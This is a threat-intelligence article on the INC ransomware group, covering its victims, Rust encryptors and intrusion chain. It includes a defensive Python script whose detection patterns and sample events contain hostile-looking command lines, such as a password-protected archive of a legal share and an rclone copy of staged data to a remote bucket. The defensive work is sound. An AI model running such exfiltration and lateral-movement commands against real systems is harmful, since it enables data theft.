The Rise of INC Ransomware: Observations from Cybersecurity Experts
Cybersecurity researchers have recently tracked the notable evolution of a ransomware group known as INC, illustrating its journey from a fledgling ransomware-as-a-service (RaaS) operation to one of the most prolific cybercriminal entities by 2026. Since August 2023, INC has reportedly targeted and compromised no less than 830 victims, marking a significant increase in cyber threats globally.
Darrel Virtusio, a researcher at Acronis, highlighted a pivotal moment in the ransomware landscape, stating that the disruption of well-known groups such as LockBit and the shutdown of BlackCat presented unique opportunities for INC’s expansion. As affiliates from these now-dismantled organizations migrated towards alternatives, INC seized the chance to solidify its position in the cybercrime hierarchy. Notably, a staggering 65% of the victims attributed to INC are based in the United States, with sectors such as legal services, manufacturing, construction, technology, and healthcare emerging as prime targets. This trend underscores the vulnerabilities that exist in industries where operational efficiency and continuity are critical.
INC’s technical sophistication has also evolved, as its encryption tools for both Windows and Linux/ESXi systems were rewritten in the Rust programming language. This adaptation allows for smoother cross-platform functionality and provides greater resilience against reverse engineering attempts. The group’s expanding arsenal includes an updated credential dumper capable of targeting recent Veeam backup deployments that utilize salted DPAPI credential encryption. This signals a clever adaptation to the evolving defensive capabilities of organizations as they strive to safeguard their systems.
Further complicating the issue, the underground cybercrime marketplace witnessed the sale of INC’s Windows and Linux variants in May 2024. This move has spurred the emergence of related ransomware families like Lynx and Sinobi, sharing significant code similarities. Such evolution highlights the collective nature of cybercriminal networks where innovations or tools can quickly proliferate among various factions.
According to Acronis, INC affiliates have employed a diverse array of techniques in their campaigns. Recent attacks reveal that they are increasingly seeking unpatched edge devices for initial access, capitalizing on existing vulnerabilities. The methodology employed includes dumping credentials from Veeam backup servers and leveraging various tools, including LOLBins and commercial remote monitoring and management (RMM) software, to navigate networks undetected.
The attack vector employed by INC follows a detailed sequence designed for effectiveness and efficiency. Initially, access is gained through various methods—spear-phishing, purchasing stolen account credentials from Initial Access Brokers (IABs), or exploiting known vulnerabilities in public-facing applications. Such vulnerabilities include exploits for Citrix Netscaler and Fortinet EMS, among others, showcasing the group’s pragmatic approach to identifying weaknesses in even well-regarded software.
Once inside a compromised environment, INC attackers systematically extract sensitive credentials, enabling further movement within the victim’s network. They rely on built-in tools and living-off-the-land binaries (LOLBins), such as Remote Desktop Protocol (RDP) and PsExec, to facilitate lateral movement, which underscores a calculated strategy to maintain a low profile as they expand their control.
Employing advanced tactics such as the Bring Your Own Vulnerable Driver (BYOVD) technique, they further compromise defenses. This approach not only enhances their foothold but also facilitates the deployment of command-and-control operations using tools like Cobalt Strike and TeamViewer, effectively allowing attackers to manipulate compromised systems remotely.
As data of interest is exfiltrated through the use of Rclone—staging it into password-protected archives—the final step involves launching the ransomware encryptor. This step is optimized through techniques like multithreading and partial encryption, which creates an efficient operational flow, particularly when the payload is executed with specific parameters aimed at shutting down virtual machines.
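The intrusion chain above (PsExec for lateral movement, an RMM tool for remote control, password-protected archives for staging, Rclone for exfiltration) lends itself to stage-based correlation rather than single-indicator alerting. The following is an added example, not code from Acronis, ZeroFox or the reporting above; the regex patterns and the Sysmon-style event lines are constructed assumptions for illustration, not published INC indicators.

```python
# Added example: correlate constructed process-creation events against the
# stages of the INC intrusion chain described in the report.
import re
from collections import defaultdict

# Each rule is (stage, regex over the command line). Patterns are assumptions
# chosen to illustrate the stages named in the report, not real INC IoCs.
STAGES = [
    ("lateral_movement", re.compile(r"(?i)\bpsexec(64)?\.exe\b")),
    ("rmm_c2",           re.compile(r"(?i)\bteamviewer\.exe\b")),
    ("staging",          re.compile(r"(?i)\b7z(a)?\.exe\b.* -p\S+")),
    ("exfiltration",     re.compile(r"(?i)\brclone(\.exe)?\b.*\b(copy|sync|move)\b")),
]

# Constructed "host|user|command line" records in a Sysmon-like shape.
SAMPLE_EVENTS = [
    "srv-file01|CORP\\svc_backup|C:\\Tools\\PsExec64.exe \\\\srv-db02 -s cmd.exe",
    "srv-file01|CORP\\svc_backup|C:\\Temp\\7z.exe a -pS3cret! D:\\stage\\legal.7z D:\\Shares\\Legal",
    "srv-file01|CORP\\svc_backup|C:\\Temp\\rclone.exe copy D:\\stage remote:bucket --transfers 16",
    "ws-hr-07|CORP\\jdoe|C:\\Program Files\\TeamViewer\\TeamViewer.exe",
    "ws-hr-07|CORP\\jdoe|C:\\Windows\\System32\\notepad.exe report.txt",
]

def classify(cmdline):
    """Return the chain stages a single command line matches (may be empty)."""
    return [stage for stage, rx in STAGES if rx.search(cmdline)]

def correlate(events):
    """Group matched stages per host. A host is flagged when staging and
    exfiltration both appear, or when three or more distinct stages appear;
    a lone RMM binary on a workstation is not enough on its own."""
    seen = defaultdict(set)
    for line in events:
        host, _user, cmd = line.split("|", 2)
        seen[host].update(classify(cmd))
    flagged = {}
    for host, stages in seen.items():
        if {"staging", "exfiltration"} <= stages or len(stages) >= 3:
            flagged[host] = sorted(stages)
    return flagged

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

In the sample, only srv-file01 is flagged; ws-hr-07 shows a single RMM process and stays below the threshold, which is the trade-off a responder tunes against their own baseline of legitimate RMM and archiving activity.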
Recent data compiled by ZeroFox indicates that INC ransomware has emerged as the fourth most prevalent ransomware group in the first quarter of 2026, trailing behind counterparts such as Qilin, Akira, and The Gentlemen. With over 120 incidents attributed to it during this period, the rising threat is becoming increasingly evident.
Acronis’s research stresses that INC continues to bolster its operations through constant development in Rust-based payloads and an ever-evolving toolkit. The group targets sectors including healthcare, legal services, and manufacturing—industries wherein operational downtime can create immense financial pressure to acquiesce to ransom demands. This financial coercion is further exacerbated by the critical dependencies these sectors have on seamless operations and stable supply chains, posing a wider risk of collateral damage across interconnected vendor networks.
The conclusion drawn from these insights forms a clear warning that the evolving landscape of ransomware presents multifaceted challenges, demanding increased vigilance and adaptive strategies from those in affected industries.
